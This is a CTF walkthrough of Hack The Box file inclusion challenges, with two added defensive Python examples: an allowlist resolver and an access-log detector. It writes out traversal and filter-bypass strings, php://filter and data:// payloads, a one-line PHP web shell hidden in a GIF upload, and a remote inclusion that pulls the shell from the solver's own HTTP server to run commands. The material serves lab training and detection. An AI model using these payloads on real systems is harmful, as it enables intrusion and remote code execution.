Solving File Inclusion CTF Challenges — A Step-by-Step Guide

Ahmet Talha Şen
Published in System Weakness
Aug 13, 2023


Introduction

Capture The Flag (CTF) challenges are popular among cybersecurity enthusiasts, as they offer exciting opportunities to test and improve their skills in various security-related areas. In this article, we will explore different techniques to solve File Inclusion challenges from the “HTB” platform. We will walk through each step, explaining the thought process and actions taken to achieve the objectives.

File Inclusion Challenge 1: Finding a User’s Name

The first challenge involves using File Inclusion to find the name of a user on the system that starts with the letter “b.”

  • Change the site language to another one and inspect the URL for potential vulnerabilities.
  • Craft a URL to include the ‘/etc/passwd’ file and observe the changes in the web page.
  • Try a relative path traversal technique (e.g., ‘../../../etc/passwd’) to reveal the usernames.
  • After finding the desired user, submit the contents of the flag.txt file located in ‘/usr/share/flags’.

File Inclusion Challenge 2: Bypassing Filters

The second challenge involves bypassing filters set up to prevent LFI exploitation:

  • Attempt to access ‘/etc/passwd’ directly and note the ‘Illegal path specified!’ error.
  • Employ a technique like ‘languages/....//....//....//....//etc/passwd’ to bypass the filter.
  • Use the same technique to access ‘/flag.txt’ and retrieve the flag.

Note: If the target web application does not allow ‘.’ and ‘/’ in our input, we can URL-encode “../” into “%2e%2e%2f”, which may bypass the filter.
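
Why the ‘....//’ form gets through, and what a robust check looks like, shown as an added example that is not code from the article or the challenge. It models in Python a filter that strips ‘../’ in a single pass (the filter itself is an assumption, since the page does not show it) beside an allowlist resolver; the names naive_filter, resolve_language and LANGUAGES and the file names are made up for the illustration.

```python
import os

def naive_filter(value: str) -> str:
    """Assumed filter: remove every '../' once, left to right, with no re-check."""
    return value.replace("../", "")

# Constructed allowlist: request value -> file name inside the language directory.
LANGUAGES = {"en": "en.php", "es": "es.php"}

def resolve_language(value: str, base_dir: str) -> str:
    """Return the file to include for an allowlisted value, else raise ValueError.

    The request value is only ever a dictionary key, never part of a path.
    The containment check on the resolved path is defence in depth, e.g.
    against a symlink placed inside the language directory.
    """
    try:
        name = LANGUAGES[value]
    except KeyError:
        raise ValueError("unknown language") from None
    base = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, path]) != base:
        raise ValueError("path escapes the language directory")
    return path

def is_rejected(value: str, base_dir: str) -> bool:
    """True when resolve_language refuses the value."""
    try:
        resolve_language(value, base_dir)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    probe = "languages/....//....//....//....//etc/passwd"
    # Removing the inner '../' of each '....//' leaves a fresh '../' behind.
    print(naive_filter(probe))
    print(is_rejected(probe, "/var/www/html/languages"))
```

Stripping in a loop until the string stops changing closes this particular gap, but an allowlist removes the need to sanitise paths at all.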

File Inclusion Challenge 3: Gaining RCE

The third challenge is about gaining Remote Code Execution (RCE) using PHP wrappers:

  • Attempt to read the ‘config’ file using the ‘php://filter/read=convert.base64-encode/resource=config’ method.
  • Use ‘php://filter/read=convert.base64-encode/resource=configure’ to find the flag in base64-encoded form.
  • Decode the flag to obtain the final answer.

File Inclusion Challenge 4: Exploiting RFI Vulnerability

The fourth challenge involves exploiting a Remote File Inclusion (RFI) vulnerability:

  • Create a PHP file (‘shell.php’) with a simple command execution payload.

echo '<?php system($_GET["cmd"]); ?>' >shell.php

cat shell.php
<?php system($_GET["cmd"]); ?>

  • Start an HTTP server to host the malicious PHP file.

sudo python -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  • As you can see, the request “/index.php?language=http://10.10.14.224/shell.php&cmd=ls” worked.
  • Use “/index.php?language=http://10.10.14.224/shell.php&cmd=ls+/” to list all the directories; this is where we found the exercise folder.

/index.php?language=http://10.10.14.224/shell.php&cmd=ls+/exercise

  • As you can see, flag.txt is inside the exercise folder.
  • Use this request to get the flag:

/index.php?language=http://10.10.14.224/shell.php&cmd=cat+/exercise/flag.txt

File Inclusion Challenge 5: Uploading Malicious File

The fifth challenge revolves around uploading a malicious file to gain access:

  • Create a GIF file (‘shell.gif’) with a PHP command execution payload.

echo 'GIF8<?php system($_GET["cmd"]); ?>' >shell.gif

cat shell.gif
GIF8<?php system($_GET["cmd"]); ?>

  • Upload the malicious file to the web application.
  • Find the directory where the file is stored by inspecting the web source.

<img src='/profile_images/shell.gif'

This request works:

http://94.237.56.76:44464/index.php?language=./profile_images/shell.gif

List the root directory:

/index.php?language=./profile_images/shell.gif&cmd=ls+/

  • Use the uploaded file to execute commands and locate the flag.

http://94.237.56.76:44464/index.php?language=./profile_images/shell.gif&cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txt

File Inclusion Challenge 6: Reading PHP.ini for Apache

The final challenge is to locate the full path to the ‘php.ini’ file for Apache:

  • SSH to the target machine using the provided credentials.
  • Find the ‘php.ini’ path using ‘php -i|grep php.ini’ and observe the ‘Loaded Configuration File’ line.
  • Access the ‘php.ini’ file at ‘/etc/php/7.4/apache2/php.ini’.
  • Block ‘system()’ in ‘php.ini’ and try executing PHP code that uses ‘system()’.
<?php system($_GET["cmd"]); ?>
PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D # base64-encoded, then URL-encoded
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls
  • Read the ‘/var/log/apache2/error.log’ file to identify the reason for blocking ‘system()’ (fill in the blank).
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat+/37809e2f8952f06139011994726d9ef1.txt
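
Every request in the six challenges leaves a recognisable ‘language’ value in the web server's access log. The following is an added example, not code from the article or from HTB: a Python scanner that classifies that parameter in combined-log-format lines. The rule names, the sample log lines and the client address are constructed, and the base64 payload is left out of the samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

PARAM = "language"  # include parameter seen in the article's URLs
RULES = [  # rule names are labels made up for this example
    ("traversal", re.compile(r"\.\.+[/\\]")),  # ../ and ....//
    ("absolute-path", re.compile(r"^/")),  # /etc/passwd
    ("stream-wrapper", re.compile(r"^(php|data)://", re.I)),
    ("remote-include", re.compile(r"^(https?|ftp)://", re.I)),
    ("upload-dir", re.compile(r"(^|/)profile_images/")),  # upload path in the article
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the names of the rules that match one parameter value."""
    for _ in range(2):  # parse_qs decoded once; undo up to two more layers
        value = unquote(value)
    return [name for name, rx in RULES if rx.search(value)]

def scan(lines):
    """Return (line_number, value, rule_names) for each suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        query = urlsplit(match.group(1)).query if match else ""
        for value in parse_qs(query).get(PARAM, []):
            hits = classify(value)
            if hits:
                findings.append((number, value, hits))
    return findings

# Constructed sample: request paths in the shapes the article uses.
PATHS = [
    "/index.php?language=es.php",
    "/index.php?language=../../../etc/passwd",
    "/index.php?language=languages/....//....//etc/passwd",
    "/index.php?language=%2e%2e%2f%2e%2e%2fetc/passwd",
    "/index.php?language=/etc/passwd",
    "/index.php?language=php://filter/read=convert.base64-encode/resource=config",
    "/index.php?language=http://10.10.14.224/shell.php&cmd=ls",
    "/index.php?language=./profile_images/shell.gif&cmd=ls+/",
]
LINE = '203.0.113.5 - - [13/Aug/2023:10:00:00 +0000] "GET {} HTTP/1.1" 200 512'
SAMPLE_LOG = [LINE.format(p) for p in PATHS]

if __name__ == "__main__":
    for number, value, hits in scan(SAMPLE_LOG):
        print(number, hits, value)
```

Only the first sample line, the ordinary language switch, passes without a finding; the value is decoded before matching so the ‘%2e%2e%2f’ form is caught by the same traversal rule.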

Conclusion

File Inclusion challenges can be both intriguing and instructive when it comes to learning about security vulnerabilities and exploiting them. By following the detailed steps provided in this article, you can gain practical experience in using File Inclusion techniques and strengthen your cybersecurity skills. Always remember to perform CTF challenges responsibly and ethically, adhering to the platform’s rules and guidelines. Happy hacking!
